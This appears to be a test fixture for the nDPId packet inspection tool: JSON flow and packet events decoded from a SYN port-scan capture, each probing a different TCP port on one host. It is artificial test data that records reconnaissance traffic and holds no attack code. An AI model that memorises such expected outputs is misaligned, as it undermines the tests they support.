+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsPLgAADAG27qsEAAIQA2GNIzSINDdUoMYAAAAAGACBAATvwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsq9EAAC0Gb6GsEAAIQA2GNIzSgBHdUoMYAAAAAGACCACwfQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsj8YAACsGjaysEAAIQA2GNIzSI5bdUoMYAAAAAGACEAAE+QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAs2tkAADEGPJmsEAAIQA2GNIzSFFDdUoMYAAAAAGACCAAcPwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAsF\/IAADsG9YCsEAAIQA2GNIzSBBjdUoMYAAAAAGACEAAkdwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAsowcAADcGbmusEAAIQA2GNIzSBpjdUoMYAAAAAGACEAAh9wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsaSUAADEGrk2sEAAIQA2GNIzTEIDdU4MZAAAAAGACCAAgDAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsv7UAADEGV72sEAAIQA2GNIzTBH\/dU4MZAAAAAGACCAAsDQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxvMAACgGWX+sEAAIQA2GNIzTJXndU4MZAAAAAGACBAAPEwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsgk8AADsGiyOsEAAIQA2GNIzTBEndU4MZAAAAAGACEAAkQwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/uEAAC4GG5GsEAAIQA2GNIzTJxndU4MZAAAAAGACDAAFcwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxT8AACsGWDOsEAAIQA2GNIzTDsjdU4MZAAAAAGACEAAZxAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxeYAADUGTYysEAAIQA2GNIzTAP7dU4MZAAAAAGACCAAvjgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsqJkAADAGb9msEAAIQA2GNIzTBC7dU4MZAAAAAGACBAAwXgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsvKcAADUGVsusEAAIQA2GNIzTCVndU4MZAAAAAGACCAAnMwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsMdwAAC8G55asEAAIQA2GNIzTC13dU4MZAAAAAGACEAAdLwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsqPUAADYGaX2sEAAIQA2GNIzTC5jdU4MZAAAAAGACDAAg9AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsCE0AADsGBSasEAAIQA2GNIzSIcvdUoMYAAAAAGACEAAGxAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWgYAADoGtGysEAAIQA2GNIzSBw3dUoMYAAAAAGACDAAlggAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAs1tAAADcGOqKsEAAIQA2GNIzSZIbdUoMYAAAAAGACEADECAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsK0kAACkG9CmsEAAIQA2GNIzSPX7dUoMYAAAAAGACCADzEAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWw4AADMGumSsEAAIQA2GNIzSA5DdUoMYAAAAAGACEAAk\/wAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAshmMAADYGjA+sEAAIQA2GNIzSAtbdUoMYAAAAAGACDAApuQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsmFEAADIGfiGsEAAIQA2GNIzSHj3dUoMYAAAAAGACDAAOUgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 